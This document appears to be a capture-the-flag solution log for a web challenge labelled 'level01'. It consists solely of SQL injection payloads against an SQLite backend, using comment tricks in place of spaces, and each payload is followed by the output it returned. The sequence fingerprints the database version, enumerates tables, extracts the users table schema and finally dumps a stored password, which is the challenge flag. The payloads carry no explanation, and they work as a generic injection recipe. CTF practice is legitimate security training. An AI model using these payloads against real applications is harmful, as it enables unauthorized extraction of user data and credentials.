level01:

1/**/union/**/select/**/sqlite_version(),null/**/order/**/by/**/id/**/desc;--
Other User Details:
id -> 3.27.2
username -> 


0/**/union/**/SELECT/**/null,tbl_name/**/FROM/**/sqlite_master/**/WHERE/**/type='table'/**/and/**/tbl_name/**/NOT/**/like/**/'sqlite_%'/**/limit/**/0,1;--
Other User Details:
id ->
username -> users


1/**/or/**/1=1/**/limit/**/0,1;--
Other User Details:
id -> 2
username -> jvoisin

1/**/union/**/SELECT/**/null,sql/**/FROM/**/sqlite_master/**/WHERE/**/type!='meta'/**/AND/**/sql/**/NOT/**/NULL/**/AND/**/name/**/NOT/**/LIKE/**/'sqlite_%'/**/AND/**/name/**/='users'/**/limit/**/0,1;--
Other User Details:
id ->
username -> CREATE TABLE users(id int(7), username varchar(255), password varchar(255))


1/**/union/**/select/**/null,password/**/from/**/users/**/limit/**/2,1;--
Other User Details:
id ->
username -> WEBSEC{Simple_SQLite_Injection}

